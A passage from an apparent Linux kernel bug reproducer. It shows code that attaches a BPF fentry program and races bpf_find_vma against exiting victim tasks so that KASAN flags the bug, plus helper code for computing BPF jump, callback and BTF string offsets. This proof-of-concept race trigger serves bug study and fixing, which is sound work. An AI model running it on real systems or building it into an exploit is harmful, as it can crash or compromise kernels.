        union bpf_attr a = {};
        a.raw_tracepoint.prog_fd = prog_fd;
        a.raw_tracepoint.name = 0; /* NULL for fentry */
        int link_fd = bpf_sys(BPF_RAW_TRACEPOINT_OPEN, &a, sizeof(a));
        if (link_fd < 0) {
            fprintf(stderr, "RAW_TRACEPOINT_OPEN: %s (errno %d)\n", strerror(errno), errno);
            /* Try BPF_LINK_CREATE instead */
            memset(&a, 0, sizeof(a));
            a.link_create.prog_fd = prog_fd;
            a.link_create.target_fd = 0;
            a.link_create.attach_type = 24; /* BPF_TRACE_FENTRY */
            link_fd = bpf_sys(BPF_LINK_CREATE, &a, sizeof(a));
            if (link_fd < 0) {
                fprintf(stderr, "LINK_CREATE: %s (errno %d)\n", strerror(errno), errno);
                return 1;
            }
        }
        printf("Fentry attached: link_fd=%d\n", link_fd);
    }

    printf("\nRacing bpf_find_vma (via fentry/getpid) vs victim task exit...\n");
    printf("CPU0: trigger (getpid), CPU1: victim (fork+mmap+exit)\n\n");

#define N_TRIG 4
#define N_VICTIM 2
#define ROUNDS 300
    pthread_t tids[N_TRIG + N_VICTIM];
    int t = 0;
    for (int i = 0; i < N_TRIG; i++)
        pthread_create(&tids[t++], NULL, trigger_thread, NULL);
    for (int i = 0; i < N_VICTIM; i++)
        pthread_create(&tids[t++], NULL, victim_thread, NULL);

    for (int r = 0; r < ROUNDS; r++) {
        sleep(1);
        if (r % 10 == 0)
            printf("  Round %d/%d...\n", r+1, ROUNDS);
    }

    stop_racing = 1;
    for (int i = 0; i < t; i++)
        pthread_join(tids[i], NULL);

    printf("\nDone. Check dmesg for KASAN reports.\n");
    return 0;
}
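
The offsets hard-coded in repro.c (jump displacements, the BPF_PSEUDO_FUNC
imm, and the name offsets into the BTF string section) can be recomputed
rather than counted by hand. A minimal sketch; bpf_jmp_off(),
bpf_pseudo_func_imm() and strtab_off() are hypothetical helper names, not part
of the kernel or libbpf. The imm formula assumes the verifier resolves the
callback subprog as ldimm64_idx + imm + 1.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Offset field for a BPF jump at index src that targets index target. */
static int bpf_jmp_off(int src, int target)
{
    return target - src - 1;
}

/* imm for an LD_IMM64/BPF_PSEUDO_FUNC pair whose first slot is ldimm64_idx. */
static int bpf_pseudo_func_imm(int ldimm64_idx, int target)
{
    return target - ldimm64_idx - 1;
}

/* Offset of name in a NUL-separated string table of len bytes, or -1. */
static int strtab_off(const char *tab, size_t len, const char *name)
{
    size_t off = 0;

    assert(tab != NULL && name != NULL);
    while (off < len) {
        const char *cur = tab + off;
        const char *end = memchr(cur, '\0', len - off);
        size_t n = end ? (size_t)(end - cur) : len - off;

        if (n == strlen(name) && memcmp(cur, name, n) == 0)
            return (int)off;
        off += n + 1;   /* skip the string and its terminating NUL */
    }
    return -1;
}
```

Applied to the program layout in load_tracing_prog(), the jumps at insns 7, 9
and 12 to insn 25 get offsets 17, 15 and 12, and the callback at insn 27
referenced from insn 16 gets imm 10. For the string section
"\0int\0main_f\0vma_cb" the names int, main_f and vma_cb sit at offsets 1, 5
and 12.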